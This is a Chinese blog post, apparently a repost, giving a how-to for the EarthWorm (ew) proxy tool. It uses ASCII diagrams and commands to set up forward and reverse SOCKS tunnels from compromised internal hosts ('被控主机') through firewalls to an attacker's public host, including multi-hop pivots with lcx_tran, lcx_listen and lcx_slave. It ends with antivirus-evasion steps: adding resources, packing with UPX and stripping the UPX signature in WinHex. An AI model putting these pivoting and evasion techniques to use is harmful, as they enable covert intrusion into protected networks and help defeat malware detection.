首页 > 其他 > 详细

ew代理

时间:2021-06-29 00:17:15      阅读:17      评论:0      收藏:0      [点我收藏+]

一、目标在公网

              +---------+     +-------------------+  
              |HackTools| ->> | 8888->  1.1.1.1   |
              +---------+     +-------------------+
ew -s ssocks -l 8888

二、目标不在公网

                                    一台可控公网IP主机                  可控内网主机
              +---------+     +--------------------------+    |     +---------------+
              |HackTools| ->> | 1080 ->  1.1.1.1 -> 8888 |  防火墙  | <--  2.2.2.2  |
              +---------+     +--------------------------+    |     +---------------+
在公网主机执行如下命令,将 1080 收到的代理请求转交给反连 8888 端口的主机
ew -s rcsocks -l 1080 -e 8888
在被控主机上执行如下命令,将主机反连到公网主机
ew -s rssocks -d 1.1.1.1 -e 8888 

三、对于二重网络环境(A主机在公网)

                                    可控边界主机A             可访问指定资源的主机B
              +---------+     +-----------------------+      +-----------------+
              |HackTools| ->> | 1080 -->  2.2.2.2 --> | ->>  | 9999 -> 2.2.2.3 |
              +---------+     +-----------------------+      +-----------------+
在第二层被控主机(B)执行如下命令:
ew -s ssocksd -l 9999
在公网主机A上执行如下命令,将1080收到的socks请求转交给2.2.2.3的主机
ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
lcx_tran   该管道,通过监听本地端口接收代理请求,并转交给代理提供主机。

四、对于二重网络环境(A主机不在公网)

                                  一台可控公网IP主机                    可控内网主机A         可访问指定资源的主机B
              +---------+     +--------------------------+    |    +-----------------+      +-----------------+
              |HackTools| ->> | 1080 ->  1.1.1.1 -> 8888 |  防火墙  | <--  2.2.2.2 --> | ->> | 9999 -> 2.2.2.3 |
              +---------+     +--------------------------+    |    +-----------------+      +-----------------+
在公网主机上执行如下命令,将1080收到的代理请求反连给8888端口
ew -s lcx_listen -l 1080 -e 8888
在可控主机B上执行如下命令,以ssocksd的方式启动9999端口的socks代理
ew -s ssocksd -l 9999
在可控主机A上执行如下命令,打通隧道
ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
lcx_listen 该管道,通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机。
lcx_slave  该管道一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机。

五、ew免杀

1、通过在github上下载ew,然后在Restorator 2018上增加图片资源
Ctrl+U增加资源
技术分享图片
修改资源图标(将ico图标拖入目录树即可),并保存
技术分享图片
2、通过UPX加壳并去除UPX字符串
技术分享图片
再通过Winhex去除字符串特征UPX
技术分享图片
技术分享图片

ew代理

原文:https://www.cnblogs.com/sakura521/p/14946390.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!